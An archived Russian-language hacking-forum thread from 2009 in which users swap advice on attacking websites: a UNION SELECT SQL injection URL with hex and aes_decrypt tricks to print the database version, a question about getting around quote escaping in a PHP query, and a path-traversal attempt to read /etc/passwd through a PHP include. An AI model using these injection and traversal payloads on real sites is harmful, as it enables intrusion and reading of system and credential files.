ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.02.2009, 01:04
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
[JavaScript], должно быть параметр передается в несколько запросов. Мне не удалось засечь вывод, поковыряй еще сам https://forum.antichat.ru/showpost.php?p=1047515&postcount=79
Сообщение от zifanchuck
Можна подзапросами мучать но я в них неселен(
Там версия 4.0 .. Подзапросы появились начиная с 4.1.0 |
|
|
22.02.2009, 12:43
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
 я в печале
допустим у нас есть такой код:
Код:
$pass = $_GET['pass'];
$pass = preg_replace("/'/", "\", $pass);
$pass = preg_replace("/\//", "\", $pass);
// etc preg_perlace заменяет некоторые символы на слэш
mysql_wuery("SELECT * FROM passwords where (pwd = '$pass' or pwd = '$pass' or pwd = '$passs')");
Собственно, ковычка обрезается, т.е. получается:
SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\')
Последний раз редактировалось it's mу; 22.02.2009 в 12:46..
|
|
|
|
22.02.2009, 17:27
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
1. До перестановки системы у меня в закладках был хороший онлайн декодирощик, адрес вспомнить немогу... а он во всё подряд переводил... сожет кто подкинет линк. кто чем пользуется!.
2. /index1.php?show=about&id0=-1+union+select+1,2,3 --
вывод на 2 поля 1 и 2 .... пишу version() или @@version ошибка.. что делать?
|
|
|
|
22.02.2009, 17:34
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 F4R
www.x3k.ru
http://www.webfuture.ru/igo/convert.php
/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --
|
|
|
|
22.02.2009, 17:38
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
Сообщение от Gorev
2 F4R
www.x3k.ru
http://www.webfuture.ru/igo/convert.php
/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --
x2k.ru
тормозной и неудобный а второй тока в sql и ораклу умеет... нао что то другое... или может есть какая то програмулька ?
а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)
неканает!
|
|
|
|
22.02.2009, 17:40
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
попробуй тогда
unhex i hex
|
|
|
|
22.02.2009, 18:22
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
а второй тока в sql и ораклу умеет
А что тебе ещё надо?
а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)
неканает!
@@version?
Кинь ссылку, да и все..
|
|
|
|
22.02.2009, 18:39
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...
|
|
|
|
22.02.2009, 19:23
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
Сообщение от Gorev
2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...
да, огромное тебе спасибо!
|
|
|
|
22.02.2009, 20:11
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Код:
Есть скрипт следующего содержания:
<?php
$base_url="";
require_once("func.php");
$l=db_connect();
$id_page=28;
echo_body($id_page);
require($base_url."inc/top2.inc.php");
//==
?>
<?php
//==
require($base_url."inc/bottom6.inc.php");?>
на сервере register_globals = On и mysql_quotes_gpc = Off
Могу ли я переопределить переменную $base_url ?
Пробовал так:
site.ru/script.php?base_url=../../../../../../../../../../../../etc/passwd%00
Но не сработало...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
